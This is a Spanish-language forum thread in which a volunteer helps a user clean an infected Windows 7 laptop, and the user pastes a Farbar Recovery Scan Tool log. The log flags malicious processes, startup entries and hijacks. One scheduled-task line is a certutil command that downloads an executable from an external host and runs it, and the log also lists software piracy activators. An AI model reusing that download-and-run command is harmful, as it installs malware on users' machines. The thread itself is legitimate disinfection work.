PC lenta y ventanas emergentes

Correcto…lo que debes hacer es picar un par de veces dentro de la ventan negra y ver si ocurre algo y de NO ocurrir nada o no dejarte NI siquiera escribir la cierras con el ASPA(X) y luego dejas o sigues los pasos que te ira dando RevoUninstaller.

Saludos.

Pude terminar el procedimiento de Revo siguiendo las recomendaciones de tu ultimo mensaje, de igual manera revise si podía abrir Malwarebytes pero aún no me deja ni en modo normal ni en modo seguro.

Bien… pasa de nuevo FRST y nos pones informes frescos… lleva cuidado al pegar los informes porque los últimos que pusiste tenían bastantes descuadres en las lineas.

Saludos.

Aquí están los nuevos informes.

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (administrador) sobre MAAH-PC (Acer Aspire 4810T) (26-03-2020 18:49:13)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Perfiles cargados: MARCO AVILA (Perfiles disponibles: MARCO AVILA & Administrador)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: FF)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

( ) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe
() [Archivo no firmado] C:\ProgramData\CloudPrinter\CloudPrinter.exe
() [Archivo no firmado] C:\ProgramData\Logic Cramble\set.exe
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\is-OCJQN.tmp\MouliaLeFil.tmp
() [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\[email protected]
() [Archivo no firmado] C:\Windows\rss\csrss.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerEvent.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTray.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWR.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe
(Acer Incorporated -> Acer) C:\Program Files\Acer\Acer Updater\UpdaterService.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe
(Acer Incorporated) [Archivo no firmado] C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe
(Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe
(Clarus, Inc.) [Archivo no firmado] C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\LManager.exe
(EGIS TECHNOLOGY INC. -> Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(EpicNet Inc.) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
(Fine Point Technologies, Inc.) [Archivo no firmado] C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe
(Ggmyhirjho) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe
(Hewlett-Packard Company -> Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
(InstallShield Software Corporation) [Archivo no firmado] C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\attrib.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\secinit.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(NewTech Infosystems, Inc -> NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\NTI Backup Now 5\SchedulerSvc.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Rfz) [Archivo no firmado] C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(Softdeluxe Ltd. -> FreeDownloadManager.org) C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Ulead Systems, Inc.) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation -> Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8060960 2009-08-05] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [PLFSetI] => C:\Windows\PLFSetI.exe [200704 2009-12-01] () [Archivo no firmado]
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2009-10-02] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [ODDPwr] => C:\Program Files\Acer\Optical Drive Power Management\ODDPwr.exe [221728 2009-09-04] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [159232 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [380928 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [358912 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1808168 2009-06-18] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-09-24] (NewTech Infosystems, Inc -> NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [1094736 2009-11-01] (Dritek System Inc. -> Dritek System Inc.)
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-16] (InstallShield Software Corporation) [Archivo no firmado]
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard Company -> Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [Chromium] => "c:\users\marco avila\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory=Default --restore-last-session
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [FloralShape] => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [2301610] => C:\Users\MARCO AVILA\AppData\Local\Temp\is-LRH00.tmp\MouliaLeFil.exe [780875 2020-03-26] ( ) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CloudNet] => C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2020-03-26] (EpicNet Inc.) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCIÓN
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
IFEO\OSPPSVC.EXE: [Debugger] [email protected]
IFEO\SppSvc.exe: [Debugger] [email protected]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer VCM.lnk [2009-12-01]
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Acer Incorporated) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Real-Time Daemon.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Real-Time Daemon.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe (Clarus, Inc.) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Scheduler.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Scheduler.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe (Clarus, Inc.) [Archivo no firmado]
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restricción ? <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {004429EA-5244-4EBD-8904-9A0C64418CB1} - System32\Tasks\{E42A772A-328E-4927-BE90-5CCB2A81671D} => C:\Program Files (x86)\RAR Password Cracker\rpc.exe
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] <==== ATENCIÓN
Task: {0914E1B1-22EB-4FEB-8194-425AA2933CBD} - System32\Tasks\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T\Setup.exe" -d "C:\Users\MARCO AVILA\Desktop\driver_Win7_OLOSTD130-T"
Task: {0CE184F9-C9A3-4546-9EDC-E5C5536E1418} - System32\Tasks\{3677C5C1-371D-4C65-8D9F-49AA4F00395C} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {0D42BDA2-8B8C-4481-A692-92E37D95D75F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {13693098-6F67-419B-B05D-CFB3FE93C43E} - System32\Tasks\{42B0B5F8-0992-46F6-B000-D55521296966} => C:\Program Files (x86)\DVDVideoSoft\Free Studio\Free Video Dub\FreeVideoDub.exe [1430168 2012-02-22] (DVDVideoSoft Ltd. -> DVDVideoSoft Ltd.) [Archivo no firmado]
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {239BEED9-169D-4095-B05B-F49FF381B453} - System32\Tasks\{2B17A2B9-CF03-415D-BC43-221C4C331B14} => C:\Users\MARCO AVILA\Desktop\UVCDriver-V2.5-for web-x86&x64-20100611\setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2AB8537C-159B-455D-9813-C7CB0BC69A90} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://promusic.website/app/app.exe C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MARCO AVILA\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ningún archivo <==== ATENCIÓN
Task: {33E26D4E-53A5-4732-9AB1-5C72A6706A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4019DA72-1B00-4FAD-8052-F0518E2C1509} - System32\Tasks\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es\MovieMaker2.1.1.exe" -d "C:\Users\MARCO AVILA\Desktop\Movie Maker 2.1.1 Es"
Task: {45BDE75E-7158-40F8-BE0E-4EDAA215FCBF} - System32\Tasks\FreeDownloadManagerNetworkMonitor => C:\Program Files\FreeDownloadManager.ORG\Free Download Manager\winwfpmonitor.exe [895688 2017-07-26] (Softdeluxe Ltd. -> FreeDownloadManager.org)
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {48185BB3-FC80-4AC8-82B8-38BFFAE0455F} - System32\Tasks\{025EAD11-7928-4F28-8569-C009EE9DCFED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\Nueva carpeta\LAN_Atheros_v1.0.0.10_Win7x86x64\setup.exe" -d "C:\Users\MARCO AVILA\Desktop\Nueva carpeta\LAN_Atheros_v1.0.0.10_Win7x86x64"
Task: {4C1B364A-AEB9-4F3A-82D7-9451A6296477} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {4CC75682-B56F-44A7-BB3A-701756EB412D} - System32\Tasks\Erocketing Disk Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Erocketing Disk Software\Erocketing Disk Software.dll",yCieHAfJDmzQ <==== ATENCIÓN
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {58A086E0-42EF-44B5-BD5E-4845892442E1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Task: {5C5F48DD-AAC1-4A2B-826F-9791035D4DC1} - System32\Tasks\{76188DFE-44A0-4E86-B159-FCBB9C714646} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 (PORTABLE)\PhotoshopPortable.exe" -d "C:\Users\MARCO AVILA\Desktop\ADOBE PHOTOSHOP CS4 (PORTABLE)"
Task: {629B73C5-E911-4CC8-B4EE-1269D96C4357} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS.exe
Task: {65927409-4FCF-45C9-8D28-8617582F8DC1} - System32\Tasks\{37C356D6-A910-448F-B5DD-7BB89821D0AD} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {674E4BF1-02A9-436F-A485-7B769400D288} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {69A5FF54-77C5-426F-ACF5-015F5A789300} - System32\Tasks\{C0B8A7A4-2234-4D94-ABDC-8D51C0DF69C0} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {721A677F-BD8C-4516-AFF3-3E6E2F7092D6} - System32\Tasks\[email protected]\Office16ProPlus => wmic path OfficeSoftwareProtectionProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {74CABDCB-9BD1-4670-B1C3-D6D9B16E5E06} - System32\Tasks\{F0BF1A23-AAD0-476B-B0AA-DB333FC92FFE} => C:\Program Files (x86)\USB2.0 PC Camera\CamApp.exe
Task: {7D310AAB-358D-447D-BDBB-005B3CD5F610} - System32\Tasks\Product Updater => C:\Program Files (x86)\Freemore Video to GIF Converter\FFProductUpdater.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8236BBBF-4E5C-4DC9-93BE-B7DDF95B8A52} - System32\Tasks\{1009BAC7-3A0A-4541-BD6F-681906513587} => C:\Users\MARCO AVILA\Desktop\Autocad 2011 (32bits)\Setup.exe
Task: {8247DF90-7C32-494A-B60B-9F24F1954183} - System32\Tasks\{1D9CB6C2-F9B3-41AE-B8EB-6EFB93E52C1A} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {8504F7E2-D1B2-4255-BDFC-71978BC3D2BD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {8B9CDFF2-ADD7-4844-9E21-432EE136C396} - System32\Tasks\{632ACBA7-5CBB-4A11-8140-A3E251857ACB} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbono\EAUninstall.exe"
Task: {8F9F0FAB-D1E7-494A-80BE-2F4B25FD6ACA} - System32\Tasks\{DFB5321F-790B-449D-A375-ED2396BB0BA7} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {968BD611-9D62-4C37-B71A-BA21308BDE53} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3965952 2020-03-26] () [Archivo no firmado] <==== ATENCIÓN
Task: {9A07DFF4-A42D-4948-B3FA-A7C3A68E7E98} - System32\Tasks\{B04818A1-4C6F-4BD3-B98B-5C67A017F2F1} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {A19BCAF8-246C-4F2A-AC23-4A816DEDFE85} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MARCO AVILA\AppData\Roaming\\timerutc\\utct.exe [67584 2017-03-17] () [Archivo no firmado]
Task: {A595D2D3-1731-4800-A267-E134D77EE33D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {A764EF5F-64B9-462D-A1E2-4859F0E01865} - System32\Tasks\{F3C2F9CF-6BD4-4E8D-A408-E8C4ED283735} => C:\Windows\system32\pcalua.exe -a C:\Windows\unvise32qt.exe -c C:\Windows\system32\QuickTime\Uninstall.log
Task: {BA81CED1-BD06-47C7-9499-6FFEEEB126E2} - System32\Tasks\{7F1A3294-4CFB-49BB-B5A4-5B003C204FE8} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {BCBC6656-A8B4-4C55-ADE0-4685D48896C8} - System32\Tasks\{A29A3ABC-F9AF-40F0-BE92-C29D4288F38F} => C:\Program Files (x86)\TubeDigger\TubeDigger.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C044705F-5982-492D-8273-246A395D7060} - System32\Tasks\{43D3B180-FDF4-4F21-B348-8DC9469A320D} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {C0DBCC98-BB2A-447E-8147-5E4759E9D96D} - System32\Tasks\System\SystemCheck => C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Helper.exe [6979584 2020-03-25] () [Archivo no firmado] <==== ATENCIÓN
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: {C8BF051C-D43A-4939-9FF4-D25C9BECFD83} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {DBB0A5E7-0BC0-4069-BA6A-C18F6DE2AB8F} - System32\Tasks\{1BBE0B68-556F-4A59-9423-95B718E85946} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A"
Task: {DC572F9E-E54E-411E-8140-DA92E12273D4} - System32\Tasks\Uninstaller_SkipUac_MARCO_AVILA => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {E29389DD-8D0F-4557-BF1A-6B61736B639E} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {E96C7094-CDA4-4D64-9B97-EBEC24982707} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {E9E54652-C473-4C56-83B9-E608F8FB8CA7} - System32\Tasks\{111E94BF-2FBE-4662-8EE2-E722532AD46A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {F5463463-DA4C-4222-898B-C5DBA5360B88} - System32\Tasks\{6A8747E5-3A68-441E-982D-533C6939C771} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Xilisoft\Video Converter Ultimate 6\Uninstall.exe"
Task: {F8891381-1E66-4481-8026-D3BB981AE07A} - System32\Tasks\{F96B9AC3-8FB4-42B5-9EF3-B8BCFA1FAC64} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {FFC54FF7-C9D4-40A6-959F-E9D45F8C20B0} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

